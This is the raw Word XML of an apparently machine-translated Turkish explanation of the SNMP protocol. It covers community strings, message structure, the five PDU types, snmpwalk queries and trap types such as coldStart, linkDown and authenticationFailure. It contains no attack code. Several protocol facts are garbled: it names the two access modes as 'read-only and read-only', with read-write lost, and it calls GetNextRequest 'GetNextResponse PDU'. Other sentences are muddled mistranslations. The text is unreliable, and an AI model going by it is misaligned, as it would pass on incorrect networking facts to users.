      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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SNMP içinde iki erişim modu vardır: salt okunur ve salt okunur. Kullanılan komut, değişken ve topluluk dizesi erişim modunu belirler. Erişim moduyla ilgili olarak, her erişim modu için bir tane olmak üzere iki topluluk dizesi bulunur. Değişkene ve ilişkili eyleme erişim aşağıdakiler tarafından kontrol edilir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Değişken, erişim tipi yok olarak tanımlandıysa, değişken hiçbir koşulda kullanılamaz.</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Değişken erişim tipinde salt okunur veya salt okunur olarak tanımlanırsa, değişken uygun alma, ayarlama veya bindirme komutları için erişilebilir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Değişken tanımlanmış bir erişim tipine sahip değilse, alma ve bindirme işlemleri için kullanılabil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nunla birlikte, bu kurallar sadece MIB değişkeninde hangi eylemlerin gerçekleştirilebileceğini belirler. SNMP ajanı ile izleme istasyonu arasındaki gerçek iletişim, mesaj alışverişi için belirlenmiş bir protokolü izler. Her mesaj şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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SNMP sürüm tanımlayıcısı</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opluluk dizes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rotokol veri birimi (PDU)</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sürüm tanımlayıcısı, kullanımda olan SNMP sürümünü - Sürüm 1, 2 veya 3'ü belirler. Daha önce belirtildiği gibi, topluluk dizesi, hangi topluluğa genel veya özel olarak erişildiğini belirler. PDU, gerçek SNMP tuzağı veya isteğini içerir. UDP bağlantı noktası 162'de bildirilen tuzaklar hariç olmak üzere, tüm SNMP istekleri UDP bağlantı noktası 161'den alınır. RFC 1157, protokol uygulamalarının 484 bayttan daha uzun mesajları kabul etmemesini gerektirmesine rağmen pratikte daha uzun bir mesaj uzunluğu destekledi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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de desteklenen beş PDU v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1. GetReques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2. GetNextReques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lastRenderedPageBreak/>
        <w:t>3. GetResponse-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4. SetReques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5. Trap-PDU</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Geçerli bir SNMP isteği iletilirken, PDU, ASN.1 notasyonundaki MIB değişkeni uygulanan işlev kullanılarak oluşturulmalıdır. ASN.1 notasyonu, kaynak ve hedef IP adresleri ve UDP portları topluluk dizgisine eklenir. İşlendikten sonra ortaya çıkan talep alıcı sisteme gönderilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8"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Kod çözme başarısız olursa, mesaj atılır. Doğru uygulanırsa, bu silme işlevi alıcı sistemin hatalı biçimlendirilmiş SNMP isteklerini görmezden gelmesine neden olmalıdır. Benzer şekilde, SNMP sürümü kontrol edilir ve bir uyuşmazlık varsa, paket de düşürülür. İstek daha sonra topluluk dizesi kullanılarak doğrulanır. Doğrulama başarısız olursa, bir doğrulama hatası olduğunu belirten bir tuzak oluşturulabilir ve paket bırakılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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esaj kabul edilirse, gerçek isteği bir araya getirmek için nesne yeniden ayrıştırılır. Ayrıştırma başarısız olursa, mesaj bırakılır. Ayrıştırma başarılı olursa, uygun SNMP probu adlandırılmış topluluk kullanılarak seçilir ve mesaj işlenir. Ortaya çıkan veriler, iste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ğin kaynak adresine döndürülür.</w:t>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F033BA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Protokol Veri Birimi</w:t>
      </w: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r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>4987290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5762625" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="56" name="Resim 56"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pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Belirtildiği gibi, desteklenen beş protokol veri birimi vardır. Her biri, SNMP ajanı ve yönetim istasyonunda belirli bir istek uygulamak için kullanılır. Her biri amaç ve işlevselliği </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">gözden geçirmek için kısaca incelenecektir. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>GetRequest PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> uzak cihazdan alınacak bilgileri ister. Yönetim istasyonu, çeşitli ağ öğelerinin sorgularını yapmak için </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>GetRequest PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">'yu kullanır. Belirtilen MIB değişkeni MIB ağ elemanında tam olarak eşleşiyorsa, değer </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>GetResponse PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanılarak döndürülür. Linux sistemlerinde yaygın olarak bulunan </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">komutunu kullanarak </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">GetRequest </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">ve </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">GetResponse </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>mesajlarının doğrudan sonuçlarını görebiliriz:</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r cihazın yukarıdaki aralıktaki tüm IP adreslerinde bulunmasına rağmen, yalnızca iki tanesi yanıt vermesi için onaylanmıştır veya belki de sağlanan SNMP topluluk dizesi hatalıydı.</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i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Snmpwalk</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'un kurulu olmadığı sistemlerde, komutun birçok ağ havuzunda bulunan net-ucb-snmp kaynak kodunda mevcut olduğunu unutmayın.</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 xml:space="preserve">, yönetim istasyonu tarafından verilen talebe yanıtı içeren protokol türüdür. Her </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GetRequest PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, isteğin geçerliliği ne olursa olsun, </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GetResponse</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanarak bir yanıtla sonuçlanı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GetNextResponse PDU, önceki bir istekten ek bilgi almak için kullanılması dışında,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 xml:space="preserve"> ile aynıdır. Alternatif olarak, MIB üzerinden tablo geçişleri tipik olarak </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GetNextResponse PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanılarak yapılır. Örneğin</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, snmpwalk</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutunu kullanarak, aşağıdaki komutu kullanarak tüm tabloyu geçebiliriz:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="2197100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="Resim 55" descr="Ekran Alıntı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kran Alıntısı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197100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Örneğimizde, tüm MIB değişkenlerinin ve bunlarla ilişkili değerlerin yazdırılmasına neden olan belirli bir MIB değişkeni talep edilmez. Bu </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'tan büyük miktarda çıktı üretir. Alınacak ek bilgi bulunmadıkça her değişken alını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lgi alma taleplerinin yanı sıra, yönetim istasyonu seçilen değişkenleri yeni değerlere de ayarlayabilir. Bu </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SetRequest PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanılarak yapılır. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SetRequest PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’yu alırken, alıcı istasyonun birkaç geçerli yanıtı vardı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Eğer belirtilen değişken değiştirilemezse, alıcı istasyon bir hata kodlu bir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 xml:space="preserve"> döndürü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Değer, belirtilen değişken tipiyle eşleşmezse, alıcı istasyon, hatalı değer göstergeli bir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 xml:space="preserve"> döndürü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Eğer talep yerel boyut sınırlamasını aşıyorsa, alıcı istasyon bir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ya çok büyük bir gösterge ile cevap ver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Eğer belirtilen değişken değiştirilemez ve yukarıdaki kurallara uymazsa,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yu kullanan alıcı istasyon tarafından genel bir hata mesajı döndürülü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İstekte hata yoksa alıcı istasyon adlandırılmış değişkenin değerini günceller. Tipik okuma-yazma topluluğuna özel denir ve bu erişim için doğru topluluk dizesi sağlanmalıdır. Değer değişirse, alıcı istasyon “Hata yok” göstergesi olan bir </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GetResponse PDU</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> döndürür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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u bölümde daha sonra tartışıldığı gibi, SNMP okuma-yazma topluluğu dizesi varsayılan ise veya başka bir iyi bilinen değere ayarlanmışsa, herhangi bir kullanıcı MIB parametrelerini değiştirebilir ve böylece sistemin çalışmasını etkileye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Traps</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tuzakları bir olayı izleme istasyonuna geri göndermek için kullanılır. Tuzak, ajanın isteği üzerine iletilir ve SNMP yapılandırmasında belirtilen cihaza gönderilir. Tuzakların kullanımı SNMP uygulamalarında evrensel olmakla birlikte, SNMP aracısının tuzağı nereye göndereceğini belirleme aracı SNMP aracı uygulamaları arasında farklılık göster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zleme istasyonuna gönderilecek birkaç tuzak v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coldStart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warmStart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linkDown</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linkUp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authenticationFailure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egpNeighborLoss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enterpriseSpeciﬁc</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uzaklar, daha önce tartışılan diğer mesaj türlerine benzer şekilde PDU kullanılarak gönder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i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ColdStart</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzağı, sistem kapalı durumdayken başlatıldığında ve aracı yeniden başlatıldığında gönderilir. Bu tuzak, izleme istasyonuna SNMP uygulamasının değiştirilmiş veya değiştirilmiş olabileceğini gösterir. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WarmStart</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzağı, sistem yeniden başlatıldığında aracının yeniden başlatılmasına neden olarak gönderilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WarmStart</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trap etkinliğinde, ne SNMP aracısının uygulaması ne de yapılandırması değiştirilmez.</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oğu ağ yönetim personeli, </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linkDown</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> linkUp</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzaklarını bilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LinkDown</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzağı, SNMP aracısındaki bir bağlantı SNMP aracısının yapılandırmasındaki bir veya daha fazla ağ bağlantısının arızasını algıladığında üretilir. Benzer şekilde, bir iletişim bağlantısı geri yüklendiğinde, </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linkUp</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzağı izleme istasyonuna gönderilir. Her iki durumda da, tuzak, hatanın veya restorasyonun gerçekleştiği ağ bağlantısını göster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oklu ağ arayüzlerine sahip bir yönlendirici olan bir cihazı göstermektedir. Kırmızı arabirimin arızası, yönlendiricinin yönetim istasyonuna bir </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linkDown</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzağı göndermesine ve nesnenin renginin değişmesine neden oldu. Yeşil nesneler şu anda işlevsel arayüzleri temsil ede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i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AuthenticationFailure</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzağı, SNMP aracısı yanlış topluluk dizesiyle bir ileti aldığında oluşturulur; bu, SNMP topluluğuna erişme girişiminin başarısız olduğu anlamına gelir. SNMP aracısı Dış Ağ Geçidi Protokolü (EGP) ilişkisinde iletişim kurduğunda ve eşe artık erişilemediğinde, yönetim istasyonuna bir </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">egpNeighborLoss </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tuzağı oluşturulur. Bu tuzak, diğer ağ bağlantılarını etkileyebilecek olan EGP eşinden alınabilecek yönlendirme bilgilerinin artık mevcut olmadığı anlamına ge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on olarak, SNMP temsilcisi bir kuruluşun Özel tuzağı oluştuğunu algıladığında </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
